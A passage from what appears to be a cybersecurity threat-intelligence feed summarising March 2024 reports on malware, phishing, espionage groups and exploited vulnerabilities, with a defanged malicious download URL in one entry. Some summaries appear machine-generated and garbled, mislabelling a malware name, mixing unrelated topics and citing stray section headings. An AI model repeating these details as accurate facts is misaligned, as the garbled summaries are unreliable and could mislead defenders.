Intel Name:: Malicious_Google_Ad_Leads_To_Matanbuchus_Infection_With_DanaBot

Date of Scan:: 2024-03-28

Impact:: LOW

Summary:: Researchers at PaloAlto have discovered that a Google advertisement leads users to a fake funds claim website, which spreads the Danabot Matanbuchus.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-03-26-IOCs-for-Matanbuchus-infection-with-Danabot.txt

Intel Source:: Checkmarx

Intel Name:: PyPi_Suspends_Project_Creation_and_User_Registration_Amid_Security_Threat

Date of Scan:: 2024-03-28

Impact:: LOW

Summary:: Checkmarx researchers uncovered a campaign leveraging numerous malicious packages, employing Typosquatting attacks through CLI for Python package installations. The attackers aim to pilfer crypto wallets, browser data, and credentials, employing persistence mechanisms for survival across reboots.

Source: https://checkmarx.com/blog/pypi-is-under-attack-project-creation-and-user-registration-suspended/

Intel Source:: CERT-AGID

Intel Name:: AgentTesla_Expands_Its_Footprint_in_Italy

Date of Scan:: 2024-03-28

Impact:: MEDIUM

Summary:: Operators of AgentTesla have recently stepped up their malspam efforts in Italy, supporting the upward trend in PDF attachment usage that has been noted in recent months. These documents have links that, when clicked, cause files containing malicious JavaScript code to be downloaded.

Source: https://cert-agid.gov.it/news/agenttesla-intensifica-la-sua-presenza-in-italia-il-ruolo-cruciale-degli-allegati-pdf/

Intel Source:: Cyble

Intel Name:: A_recent_leak_of_a_Solana_drainer_source_code

Date of Scan:: 2024-03-28

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs (CRIL) found multiple drainer source codes leaked on cybercrime forums, including a recent leak of a Solana drainer’s source code.

Source: https://cyble.com/blog/solana-drainers-source-code-saga-tracing-its-lineage-to-the-developers-of-ms-drainer/

Intel Source:: Cyble

Intel Name:: After_FBI_Seizure_WarzoneRAT_Returns_With_Multi_Stage_Attack

Date of Scan:: 2024-03-28

Impact:: MEDIUM

Summary:: Researchers at Cyble have noticed a campaign with a tax theme that may have spread via spam emails. Investigations revealed that the campaign disseminated the malware WarzoneRAT (Avemaria). The malware known as AveMaria is a Remote Administration Tool (RAT) that possesses the ability to take commands from a Command and Control (C&C) server and carry out a range of malevolent activities.

Source: https://cyble.com/blog/warzonerat-returns-with-multi-stage-attack-post-fbi-seizure/

Intel Source:: ISC.SANS

Intel Name:: An_interesting_piece_of_JavaScript

Date of Scan:: 2024-03-28

Impact:: LOW

Summary:: Senior ISC Handler Xavier Mertens recently found an interesting piece of JavaScript payload and provided analysis. This payload was downloaded from hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1. Once you fetched the page, it won’t work and will redirect you to another side. And Finally, another payload is delivered.

Source: https://isc.sans.edu/diary/rss/30788

Intel Source:: Esentire

Intel Name:: Exploitation_of_Fortinet_Vulnerability_CVE_2023_48788

Date of Scan:: 2024-03-28

Impact:: MEDIUM

Summary:: This month, eSentire has tracked a spike in the exploitation of CVE-2023-48788 (CVSS: 9.8). CVE-2023-48788 is a SQL injection flaw in FortiClientEMS software. Exploitation would allow an unauthenticated remote threat actor to execute code or commands through specially crafted requests, enabling initial organizational access.

Source: https://www.esentire.com/security-advisories/widespread-exploitation-of-fortinet-vulnerability-cve-2023-48788

Intel Source:: EclecticIQ

Intel Name:: Cyber_Espionage_Campaign_Targeting_Indian_Government_Entities_and_Energy_Sector

Date of Scan:: 2024-03-28

Impact:: MEDIUM

Summary:: Researchers at EclecticIQ have discovered a new espionage effort that uses a customized version of HackBrowserData, an open-source information stealer that can gather cookies, history, and browser login credentials, to target Indian government entities and the nation's energy sector.

Source: https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign

Intel Source:: ISC.SANS

Intel Name:: JavaScript_to_AsyncRAT_Transition

Date of Scan:: 2024-03-28

Impact:: LOW

Summary:: SANS researchers have analyzed and discovered an intriguing piece of JavaScript. This one was obfuscated quite effectively. The file was named "_Rechnung_01941085434_PDF.js" (Invoice in German). The first obfuscation method is simple yet effective, as it stops a lot of utilities from operating correctly on distributions such as REMnux.

Source: https://isc.sans.edu/diary/From+JavaScript+to+AsyncRAT/30788

Intel Source:: CYFIRMA Research

Intel Name:: A_New_Info_Stealer_Named_Sync_Scheduler

Date of Scan:: 2024-03-28

Impact:: LOW

Summary:: Cyfirma researchers have found Sync-Scheduler, an information-stealing malware that targets documents in particular and has anti-analysis built in. The research details the procedures used to create malware payloads and investigates the evasion strategies used by threat actors to avoid detection through in-depth examination.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_sync-scheduler-stealer-activity-7178734723601485824-gOFs?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Checkpoint

Intel Name:: The_Tax_Scam_Tsunami

Date of Scan:: 2024-03-28

Impact:: LOW

Summary:: Check Point Research team has observed multiple instances of tax-related phishing scams and malware. The attack is focusing on to induce the end-user to either give over sensitive information or money.

Source: https://blog.checkpoint.com/security/beware-the-tax-scam-tsunami-unmasking-qr-code-schemes-bogus-refunds-and-ai-imposters/

Intel Source:: Securelist

Intel Name:: DinodasRAT_Linux_backdoor

Date of Scan:: 2024-03-28

Impact:: MEDIUM

Summary:: DinodasRAT, also known as XDealer, is a multi-platform backdoor written in C++ that offers a range of capabilities. This RAT allows the malicious actor to surveil and harvest sensitive data from a target’s computer. A Windows version of this RAT was used in attacks against government entities in Guyana.

Source: https://securelist.com/dinodasrat-linux-implant/112284/

Intel Source:: PaloAlto

Intel Name:: Enhance_Cyberespionage_Activities_Against_ASEAN_Nations_by_Two_Chinese_APT_Groups

Date of Scan:: 2024-03-27

Impact:: MEDIUM

Summary:: Researchers from Unit 42 have discovered two Chinese advanced persistent threat (APT) groups that are involved in cyberespionage against members and organizations connected to the Association of Southeast Asian Nations (ASEAN). Stately Taurus, the first APT organization, is believed to have targeted entities in Myanmar, the Philippines, Japan, and Singapore with two malware packages. An ASEAN-affiliated entity was infiltrated by the second Chinese APT outfit. In recent months, this APT group has attacked a number of government institutions in Southeast Asia, including those in Singapore, Laos, and Cambodia.

Source: https://unit42.paloaltonetworks.com/chinese-apts-target-asean-entities/

Intel Source:: SOC Radar

Intel Name:: A_Robust_Cyberthreat_to_Brazil_Monetary_Security_CHAVECLOAK

Date of Scan:: 2024-03-27

Impact:: LOW

Summary:: CHAVECLOAK, a banking trojan that has become a serious threat, is a strong cyber threat threatening the Brazilian financial system. This sophisticated malware is made to get past security measures and steal confidential financial data from unsuspecting users.

Source: https://socradar.io/chavecloak-cyber-threat-to-brazils-financial-security/

Intel Source:: Rewterz

Intel Name:: FormBook_Malware

Date of Scan:: 2024-03-27

Impact:: MEDIUM

Summary:: FormBook, an information stealer (infostealer) malware discovered in 2016, has various capabilities such as tracking keystrokes, accessing files, capturing screenshots, and stealing passwords from web browsers. It can execute additional malware as directed by a command-and-control server and is adept at evading detection through techniques like code obfuscation and encryption. FormBook's flexibility allows customization for specific targets and its obfuscation methods make removal challenging. Cybercriminals distribute FormBook through email attachments like PDFs and Office Documents, with notable use during the 2022 Russia-Ukraine conflict. FormBook's successor, XLoader, is currently active.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-formbook-malware-active-iocs-98

Intel Source:: Morphisec

Intel Name:: Increase_in_activity_linked_to_Mispadu_banking_trojan

Date of Scan:: 2024-03-27

Impact:: LOW

Summary:: Morphisec Labs identified a significant increase in activity linked to Mispadu, a banking trojan first flagged in 2019. Initially concentrated on LATAM countries and Spanish-speaking individuals, Mispadu has broadened its scope in the latest campaign.

Source: https://blog.morphisec.com/mispadu-infiltration-beyond-latam

Intel Source:: SonicWall

Intel Name:: Introducing_The_Most_Recent_Version_of_WhiteSnake_Stealer

Date of Scan:: 2024-03-27

Impact:: LOW

Summary:: Researchers at SonicWall have discovered a new WhiteSnake Stealer version that makes it possible to steal vital, private information from infected systems.The string decryption code has been eliminated in this updated version, which also makes the code easier to understand.

Source: https://blog.sonicwall.com/en-us/2024/03/whitesnake-stealer-unveiling-the-latest-version-less-obfuscated-more-dangerous/

Intel Source:: Cybereason

Intel Name:: The_Effects_of_the_Anydesk_Breach

Date of Scan:: 2024-03-27

Impact:: LOW

Summary:: Researchers at Cybereason have looked at cases of AnyDesk code signing certificates being misused. On February 2, 2024, AnyDesk, a prominent global supplier of Remote Management and Monitoring (RMM) software, made a public announcement announcing that they had discovered a compromise involving production systems. As a result, they started an incident response process and, as part of their remediation activities, they issued fresh certificates and revoked all of their security-related ones.

Source: https://www.cybereason.com/blog/threat-alert-the-anydesk-breach-aftermath

Intel Source:: Lumen

Intel Name:: The_Shadowy_Side_Of_TheMoon_Malware

Date of Scan:: 2024-03-27

Impact:: LOW

Summary:: Researchers at Lumen have discovered a multi-year campaign that targeting Internet of Things (IoT) devices and routers that are nearing end of life (EoL). This campaign is linked to an upgraded version of the malware known as "TheMoon." Since its inception in 2014, TheMoon has been running in the background, amassing almost 40,000 bots from 88 countries in January and February of 2024. As researchers have observed, most of these bots serve as the backbone of Faceless, a well-known proxy service targeted at cybercriminals.

Source: https://blog.lumen.com/the-darkside-of-themoon/?utm_source=rss&utm_medium=rss&utm_campaign=the-darkside-of-themoon

Intel Source:: Oligo Security

Intel Name:: Cyberattacks_Risk_Thousands_of_Businesses_Using_Ray_Framework

Date of Scan:: 2024-03-27

Impact:: LOW

Summary:: Researchers at Oligo have recently uncovered an ongoing campaign of attacks aimed at a flaw in the popular open-source AI framework Ray. There is no patch for a significant vulnerability that exposes thousands of businesses and servers using AI infrastructure to attack. Due to this flaw, hackers can commandeer the processing power of the organizations and reveal confidential information. For the past seven months, this vulnerability has been actively exploited, impacting a variety of industries including biopharma, education, and cryptocurrencies.

Source: https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild

Intel Source:: TrendMicro

Intel Name:: Custom_PowerShell_Script_Allows_Agenda_Ransomware_to_Spreadto_vCenters_and_ESXi

Date of Scan:: 2024-03-26

Impact:: LOW

Summary:: Newer variants of the ransomware, particularly for its Rust form, have been discovered by TrendMicro researchers. Based on their observations, the Agenda ransomware gang deploys the ransomware binary using Cobalt Strike and Remote Monitoring and Management (RMM) technologies. Regarding the Agenda ransomware executable, it can spread using PsExec and SecureShell in addition to using other weak SYS drivers to get around security measures.

Source: https://www.trendmicro.com/en_us/research/24/c/agenda-ransomware-propagates-to-vcenters-and-esxi-via-custom-pow.html

Intel Source:: Trustwave

Intel Name:: The_rise_of_Agent_Tesla

Date of Scan:: 2024-03-26

Impact:: MEDIUM

Summary:: SpiderLabs discovered some phishing email on March 8, 2024, with a Windows executable disguised as a fraudulent bank payment attached to the email. This activity initiated an infection chain culminating in the deployment of Agent Tesla. Trustwave blog shared their deep analysis of a newly identified loader, showing the attack's advanced tactics, techniques, and procedures (TTPs) used in both the loader and its command and control (C2) framework.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/agent-teslas-new-ride-the-rise-of-a-novel-loader/

Intel Source:: CERT-AGID

Intel Name:: Phishing_Attack_Designed_to_Steal_Security_Information_And_Credentials

Date of Scan:: 2024-03-26

Impact:: LOW

Summary:: Researchers from CERT-AGID have discovered a phishing page that targeting users of the Revenue Agency's Siatel v2.0 – PuntoFisico of the Revenue Agency. It has been live online from the early afternoon of March 21, 2024. Once the victims have been tricked into entering their password and tax code as part of their access credentials, the attackers ask them to upload or complete a photo of the Security Matrix that corresponds with the given credentials. Access to Punto Fisico, Report Register, and Punto Fisico User Management are all dependent on the latter.

Source: https://cert-agid.gov.it/news/agenzia-delle-entrate-punto-fisico-campagna-di-phishing-mirata-al-furto-di-credenziali-e-matrici-di-sicurezza/

Intel Source:: Sekoia

Intel Name:: Phishing_Kit_With_New_MFA_Targeting_Gmail_And_Microsoft_365_Accounts

Date of Scan:: 2024-03-26

Impact:: LOW

Summary:: Tycoon 2FA was first detected by Sekoia researchers in October 2023 while conducting standard threat hunting. However, it has been operational since August 2023, when the Saad Tycoon group made it available via secret Telegram channels. The Sekoia team thoroughly examined the Tycoon 2FA PhaaS kit and shared some of their discoveries to the Twitter community. Since then, researchers have been keeping a close eye on the putative developer's activity, campaigns using the kit, source code upgrades, and the infrastructure of Tycoon 2FA phishing URLs.

Source: https://blog.sekoia.io/tycoon-2fa-an-in-depth-analysis-of-the-latest-version-of-the-aitm-phishing-kit/#h-iocs-amp-technical-details

Intel Source:: CERT-AGID

Intel Name:: An_Attempt_to_Phish_Outlook_Addresses_PAs

Date of Scan:: 2024-03-26

Impact:: MEDIUM

Summary:: Researchers from CERT-AgID have alerted authorities to an ongoing campaign targeting public administrations with the goal of obtaining login credentials for Microsoft Outlook email accounts. In an effort to get login passwords and other sensitive data, attackers posing as company HR or accounting departments are sending fraudulent emails that purport to offer salary adjustments or access to electronic payslips.

Source: https://cert-agid.gov.it/news/campagna-di-phishing-outlook-rivolta-alle-pa/

Intel Source:: ASEC

Intel Name:: Unraveling_the_Kimsuky_Groups_Malware_Attacks_on_South_Korea

Date of Scan:: 2024-03-26

Impact:: LOW

Summary:: The Kimsuky group's latest cyber espionage efforts against South Korean targets involve sophisticated malware, including a dropper masquerading as an installer from a public institution and the Endoor and Nikidoor backdoors for system infiltration and data theft. These attacks leverage social engineering, misuse of legitimate certificates, and command-and-control servers to achieve stealth, persistence, and exfiltration. Highlighting the critical need for updated security defenses and awareness, this analysis underscores the ongoing threat posed by the Kimsuky group's advanced tactics.

Source: https://asec.ahnlab.com/en/63396/

Intel Source:: Infoblox

Intel Name:: Cobalt_strike_DNS_early_detection

Date of Scan:: 2024-03-25

Impact:: LOW

Summary:: Infoblox presented their study demonstrating the value of detecting attempted DNS exfiltration and Command and Control (C2) communications. They focused their study on two anonymized customers: a large e-commerce/retail company (Customer #1) and an educational institution (Customer #2).

Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-early-detection-cobalt-strike-dns-c2/

Intel Source:: Checkmarx

Intel Name:: Attack_using_fake_Python_Infrastructure

Date of Scan:: 2024-03-25

Impact:: LOW

Summary:: This month the Checkmarx researchers discovered a campaign targeting the software supply chain, with proof of the successful exploitation of multiple victims. These include the Top.gg GitHub organization (a community of over 170k users) and several individual developers.

Source: https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/

Intel Source:: Mandiant

Intel Name:: German_political_parties_attacked_by_APT29_with_WINELOADER

Date of Scan:: 2024-03-25

Impact:: MEDIUM

Summary:: In late February 2024, Mandiant identified APT29 — a Russian Federation-backed threat group linked by multiple governments to Russia’s Foreign Intelligence Service (SVR) — conducting a phishing campaign targeting German political parties.

Source: https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties

Intel Source:: Any.Run

Intel Name:: Reverse_Engineering_Snake_Keylogger_analysis

Date of Scan:: 2024-03-25

Impact:: LOW

Summary:: Any.Run researcher provided her sandbox analysis to understand the malware’s behavior. The insights from sandbox analysis provide a foundational understanding of reverse Engineering Snake Keylogger and of what to anticipate and what specific aspects to investigate during the reverse engineering process.

Source: https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/

Intel Source:: Sonatype

Intel Name:: Attackers_next_target_ML_AI_models

Date of Scan:: 2024-03-25

Impact:: LOW

Summary:: Sonatype analysts discovered a couple of open-source ML/AI models shared by data scientists and security researchers that proved that malware can creep onto AI platforms. Other examples include malicious models that were already reported by the community members and have since been booted off the platform.

Source: https://blog.sonatype.com/open-source-ml/ai-models-attackers-next-potential-target

Intel Source:: Resecurity

Intel Name:: Online_scams_during_Ramadan_and_Eid_Fitr

Date of Scan:: 2024-03-25

Impact:: LOW

Summary:: This month during the holiday of Ramadan, Resecurity researchers discovered a significant spike in fraud activities and scams, coinciding with a surge in retail and online transactions.

Source: https://www.resecurity.com/blog/article/cybercriminals-accelerate-online-scams-during-ramadan-and-eid-fitr

Intel Source:: Malwarebytes

Intel Name:: New_Go_loader_uses_Rhadamanthys_stealer

Date of Scan:: 2024-03-25

Impact:: MEDIUM

Summary:: Malwarebytes researchers described in their post a malvertising campaign with a new loader. The program is in the Go language and deploys a payload, the Rhadamanthys stealer. PuTTY is a trendy SSH and Telnet client for Windows that IT admins have used for years. The threat actor bought an ad that pretended to be the PuTTY homepage and appeared at the top of the Google search results page, right before the official website.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/03/new-go-loader-pushes-rhadamanthys

Intel Source:: PaloAlto

Intel Name:: Technical_Analysis_of_FalseFont_Backdoor

Date of Scan:: 2024-03-22

Impact:: MEDIUM

Summary:: The article provides a detailed analysis of the FalseFont backdoor, a new malware developed by the Curious Serpens threat actor. The backdoor targets the aerospace and defense industries by masquerading as legitimate human resources software. The article discusses the backdoor's architecture, functionality, and communication with threat actors, as well as ways to detect and prevent it. It also includes indicators of compromise and recommendations for improving security practices. The article also delves into the methods used by attackers to interact with the backdoor, including predefined commands and real-time communication through SignalR. It also describes the process of sending recurring requests to the backdoor's command and control server.

Source: https://unit42.paloaltonetworks.com/curious-serpens-falsefont-backdoor/

Intel Source:: Mandiant

Intel Name:: Chinese_Government_Hacker_Using_ScreenConnect_and_F5_Bugs_to_Attack_Defense_and_Government_Entities

Date of Scan:: 2024-03-22

Impact:: MEDIUM

Summary:: A hacker allegedly connected to the People's Republic of China has been exploiting two popular vulnerabilities to attack U.S. defense contractors, U.K. government entities and institutions in Asia.

Source: https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect

Intel Source:: Sentilone

Intel Name:: AcidPour_new_embedded_wiper_variant_of_AcidRain

Date of Scan:: 2024-03-22

Impact:: MEDIUM

Summary:: The article discusses the discovery of a new variant of the malware AcidRain, called AcidPour, which has been causing disruptions in Ukraine and Europe during the Russian invasion. The section titled "Title-Abstract. Section intro" provides an overview of the AcidPour variant, including technical details such as its MD5, SHA1, SHA256, size, and type. It also highlights the similarities between AcidRain and AcidPour, as well as the added functionality of AcidPour for handling Unsorted Block Image (UBI) and Device Mapper (DM) logic. The section also notes the coding style of AcidPour and its self-delete function and alternate device wiping mechanism.

Source: https://www.sentinelone.com/labs/acidpour-new-embedded-wiper-variant-of-acidrain-appears-in-ukraine/

Intel Source:: Proofpoint

Intel Name:: TA450_Uses_Embedded_Links_in_PDF_Attachments

Date of Scan:: 2024-03-22

Impact:: LOW

Summary:: The article discusses a recent phishing campaign by the threat actor TA450, targeting Israeli employees at large multinational organizations. The campaign used a pay-related social engineering lure and contained PDF attachments with malicious links to file-sharing sites. This marks a change in tactics for the threat actor, who typically uses malicious links directly in email bodies. The campaign also used a sender email account that matched the lure content and continued TA450's trend of targeting Israeli individuals using Hebrew language lures and compromised .IL accounts. The section provides ET signatures and indicators of compromise for organizations to protect against this threat.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign

Intel Source:: Talos

Intel Name:: New_Details_on_TinyTurla_Post_Compromise_Activity

Date of Scan:: 2024-03-22

Impact:: LOW

Summary:: The article discusses the ongoing campaign by the Russian espionage group Turla, specifically their use of the TinyTurla-NG implant. New information is revealed on the group's tactics, techniques, and procedures (TTPs) used to steal valuable information and spread through infected networks. The analysis, in collaboration with CERT.NGO, shows that Turla has infected multiple systems in a European NGO's network. The attackers have taken preliminary post-compromise actions such as establishing persistence and adding exclusions to anti-virus products. They also used a custom-built Chisel beacon from an open-sourced offensive framework. The article provides a visual representation of the infection chain and offers ways for customers to detect and block this threat. It also includes a list of associated hashes, domains, and IP addresses.

Source: https://blog.talosintelligence.com/tinyturla-full-kill-chain/

Intel Source:: Talos

Intel Name:: Pig_butchering_scams

Date of Scan:: 2024-03-22

Impact:: LOW

Summary:: The article discusses the evolution of social engineering tactics, specifically "catfishing" or "romance scams," which involve scammers building relationships with targets to eventually scam them out of money. The section explains the process and differences between "pig butchering" and traditional romance scams, emphasizing the importance of user education and law enforcement involvement. It then transitions to discussing Talos' research on the Turla APT and their use of a new tool, TinyTurla-NG, to target Polish NGOs and steal sensitive data. The section concludes by mentioning Talos' efforts to provide detection content for Cisco Secure products and highlighting the top security headlines of the week.

Source: https://blog.talosintelligence.com/threat-source-newsletter-march-21-2024/

Intel Source:: PaloAlto

Intel Name:: Massive_StrelaStealer_Initiative_in_First_Half_of_2024

Date of Scan:: 2024-03-22

Impact:: LOW

Summary:: Researchers at PaloAlto have discovered a wave of extensive StrelaStealer campaigns that are affecting more than 100 organizations in the US and the EU. Spam emails with attachments that finally start the StrelaStealer DLL payload are the shape that these campaigns take.

Source: https://unit42.paloaltonetworks.com/strelastealer-campaign/#post-133130-_vl741f7mzldf

Intel Source:: ASEC

Intel Name:: Caution_Regarding_Infostealer_Posing_as_Installer

Date of Scan:: 2024-03-21

Impact:: LOW

Summary:: Researchers from ASEC have seen a widespread distribution of the StealC malware, which is disguising itself as an installer. It was found to be downloaded through Dropbox, GitHub, Discord, and other services. It is anticipated that victims will be redirected several times from a malicious webpage masquerading as a download page for a specific program to the download URL, given the incidents of dissemination via similar pathways.

Source: https://asec.ahnlab.com/en/63308/

Intel Source:: Recorded Future

Intel Name:: Numerous_Chinese_State_Sponsored_Groups_Are_Associated_With_Private_Contractor

Date of Scan:: 2024-03-21

Impact:: LOW

Summary:: A fresh perspective on the latest i-SOON leak is provided by New Insight Group Research. China's state-sponsored cyber espionage operations were made public on February 18, 2024, according to an anonymous document leak from Anxun Information Technology Co., Ltd. (i-SOON), a cybersecurity and IT company in China. The breach is noteworthy because it exposes the links between i-SOON and a number of state-sponsored cyber groups in China, including RedAlpha, RedHotel, and POISON CARP. These connections point to a complex web of espionage activities, including the theft of communications records in order for tracking down specific individuals.

Source: https://go.recordedfuture.com/hubfs/reports/cta-2024-0320.pdf

Intel Source:: Welivesecurity

Intel Name:: AceCryptor_Malware_Increased_Throughout_Europe

Date of Scan:: 2024-03-21

Impact:: LOW

Summary:: ESET researchers have been studying AceCryptor for years, and on Wednesday they said that the latest campaign differed from earlier versions due to the attackers' increased arsenal of harmful code. Typically, AceCryptor is used in conjunction with malware called Remcos or Rescoms, a potent remote surveillance tool that researchers have frequently observed being utilized against Ukrainian businesses.

Source: https://www.welivesecurity.com/en/eset-research/rescoms-rides-waves-acecryptor-spam/

Intel Source:: Imperva

Intel Name:: New_Sysrv_botnet_variant_spreads_XMRig_Miner

Date of Scan:: 2024-03-21

Impact:: MEDIUM

Summary:: A new variant of the Sysrv botnet was observed exploiting vulnerabilities in Apache Struts and Atlassian Confluence to spread an XMRig cryptominer payload. The malware made use of a compromised Malaysian academic website and Google subdomain to distribute malicious files. Enhancements include obfuscation and architecture preparation functions. The malware connects to MoneroOcean mining pool endpoints and mines to a specific wallet. Defenders should block suspicious outbound connections and inspect seemingly legitimate sites for malicious files.

Source: https://www.imperva.com/blog/new-sysrv-botnet-variant-makes-use-of-google-subdomain-to-spread-xmrig-miner/

Intel Source:: ISC.SANS

Intel Name:: Investigations_into_CVE_2024_21762_Vulnerability_and_Fortinet_FortiOS

Date of Scan:: 2024-03-21

Impact:: LOW

Summary:: ISC.SANS researchers have noticed that an attack for CVE-2024-21762 has leaked on GitHub. The FortiOS operating system from Fortinet is vulnerable. February 8th saw the release of a patch. Device owners were given more than a month to apply the fix. A few days before the exploit was released on GitHub, it was made available on the Chinese QQ messaging network.

Source: https://isc.sans.edu/diary/Scans+for+Fortinet+FortiOS+and+the+CVE202421762+vulnerability/30762/

Intel Source:: Rapid7

Intel Name:: The_Kimsuky_threat_actor_group_activity

Date of Scan:: 2024-03-21

Impact:: MEDIUM

Summary:: The article discusses the latest tactics and techniques used by the Kimsuky threat actor group, also known as Black Banshee or Thallium. The group, originating from North Korea, primarily focuses on intelligence gathering and has targeted South Korean government entities, individuals involved in the Korean peninsula's unification process, and global experts in fields relevant to the regime's interests. The section highlights the group's evolving methods, such as using weaponized Office documents, ISO files, and shortcut files (LNK files) to bypass modern security measures. The latest findings reveal that the group is now using CHM files, which are compiled HTML help files, to distribute malware and gain access to their targets. The section provides a detailed analysis of a CHM file used by the group, including its file structure, language, and code snippets. It also explains how the group uses HTML and ActiveX to execute arbitrary commands on a victim's machine and create persistence. The article also includes a visualization of the attack flow and a list of detections that Rapid7 customers can use to protect against this campaign. Overall, the article sheds light on the Kimsuky threat actor group's tactics and provides valuable insights for organizations to protect themselves against this campaign.

Source: https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/

Intel Source:: Sucuri

Intel Name:: Sign1_malware_analysis

Date of Scan:: 2024-03-21

Impact:: LOW

Summary:: The article titled "Sign1 Malware: Analysis, Campaign History & Indicators of Compromise" delves into the details of a recent malware campaign known as Sign1. The campaign has affected over 39,000 websites in the past 6 months and is typically injected through custom HTML widgets. The malware redirects users to malicious sites, often related to the VexTrio scam. The section provides a comprehensive analysis of the campaign, including its evolution since it was first noticed in 2023. The attackers have changed their obfuscation methods and use a timestamp trick in their URLs. The section also lists the various domains used by the attackers and their registration dates, as well as the number of infected sites associated with each domain. The author recommends securing the admin panel and using website monitoring tools to protect against this type of malware. The article also includes a case study of a client who experienced the Sign1 malware and how they traced it back to the campaign. The section discusses the various indicators of compromise for this malware, including its campaign history, obfuscation techniques, and how to detect and mitigate it. The author provides a breakdown of the JavaScript code used in the malware and how it dynamically generates URLs to redirect visitors to scam sites. The section concludes with a list of conditions that must be met for the malware to execute, including a specific cookie and correct referrer. Overall, the article provides a detailed overview of the Sign1 malware campaign and offers valuable insights for website owners to protect against it.

Source: https://blog.sucuri.net/2024/03/sign1-malware-analysis-campaign-history-indicators-of-compromise.html

Intel Source:: SentinelLabs

Intel Name:: New_AcidPour_Data_Wiper_Targeting_Linux_x86_Network_Devices

Date of Scan:: 2024-03-20

Impact:: LOW

Summary:: Researchers at SentinelLabs have discovered AcidPour, a new harmful malware that targets Linux x86 networking and Internet of Things devices and has data-wiper functionality. While AcidPour and AcidRain target comparable directories and device paths found in embedded Linux distributions, there is an estimated 30% overlap in their codebases.

Source: https://www.bleepingcomputer.com/news/security/new-acidpour-data-wiper-targets-linux-x86-network-devices/

Intel Source:: Trend Micro

Intel Name:: Exploits_For_TeamCity_Vulnerabilities_Lead_to_Jasmin_Ransomware

Date of Scan:: 2024-03-20

Impact:: LOW

Summary:: A serious risk to enterprises using TeamCity On-Premises for their CI/CD procedures is the active exploitation of vulnerabilities in the platform. According to Trend Micro telemetry, threat actors are using these vulnerabilities to infect infected TeamCity servers with ransomware, coinminers, and backdoor payloads.

Source: https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html

Intel Source:: Juniper

Intel Name:: Androshield_malware_targets_networks

Date of Scan:: 2024-03-20

Impact:: MEDIUM

Summary:: The article discusses the importance of patch management and network security measures in protecting networks from cyber threats. It specifically focuses on the Androxgh0st malware, which targets Laravel applications and exploits vulnerabilities such as CVE-2017-9841 and CVE-2018-15133. The article provides a technical analysis of the malware and its methods of exploitation, as well as ways to protect against it, such as encrypting sensitive information and using multi-factor authentication. It also highlights the use of Juniper IDS and ATP Cloud as a proactive defense against Androxgh0st and other cyber attacks. The article also discusses potential network disruptions caused by exploits of SMTP, AWS, SendGrid, and Twilio, and the risk of data breaches through the exploitation of .env files. It concludes by emphasizing the importance of regularly updating and patching systems, as well as implementing strong security measures to prevent unauthorized access and mitigate risks.

Source: https://blogs.juniper.net/en-us/security/shielding-networks-against-androxgh0st

Intel Source:: ASEC

Intel Name:: Persistent_Cyber_Threats_Targeting_Korean_Corporations

Date of Scan:: 2024-03-19

Impact:: LOW

Summary:: AhnLab Security Intelligence Center (ASEC) has uncovered a series of ongoing attacks by the Andariel group targeting Korean companies. Notably, the group leverages installations of MeshAgent alongside other remote management tools to facilitate diverse remote control capabilities. Exploiting Korean asset management solutions, the group installs malware such as AndarLoader and ModeLoader during lateral movement phases. AndarLoader, a downloader, retrieves executable data like .NET assemblies from C&C servers. MeshAgent, a remote management tool, enables screen control and was used for the first time by the Andariel group. ModeLoader, a JavaScript malware, is externally downloaded via Mshta for execution.

Source: https://asec.ahnlab.com/en/63192/

Intel Source:: Russian Panda

Intel Name:: The_GlorySprout_stealer_and_others

Date of Scan:: 2024-03-19

Impact:: LOW

Summary:: A new information stealer named GlorySprout surfaced in cybercrime forums in March 2024. Technical analysis shows it is likely a clone of the older Taurus stealer, sharing code similarities but lacking some features like Anti-VM. GlorySprout is unlikely to gain popularity compared to other stealers.

Source: https://russianpanda.com/2024/03/16/The-GlorySprout-Stealer-or-a-Failed-Clone-of-Taurus-Stealer/

Intel Source:: ASEC

Intel Name:: The_Revival_of_a_Notorious_Ransomware_Threat

Date of Scan:: 2024-03-19

Impact:: MEDIUM

Summary:: AhnLab Security Intelligence Center (ASEC) has uncovered the resurgence of CryptoWire, a ransomware strain that wreaked havoc back in 2018. Utilizing Autoit scripting and distributed primarily through phishing emails, CryptoWire exhibits sophisticated features including self-replication, network exploration for file encryption, and data deletion measures to thwart recovery efforts. Unlike many ransomware variants, CryptoWire exposes decryption keys, either embedded within the malware or transmitted to the threat actor's server. With its file encryption tactics and demand for ransom, users are urged to exercise caution, employ anti-malware solutions, and maintain up-to-date system security to thwart potential infections and safeguard against data loss.

Source: https://asec.ahnlab.com/en/63200/

Intel Source:: Shadowstackre

Intel Name:: A_new_ransomware_gang_called_Donex

Date of Scan:: 2024-03-19

Impact:: LOW

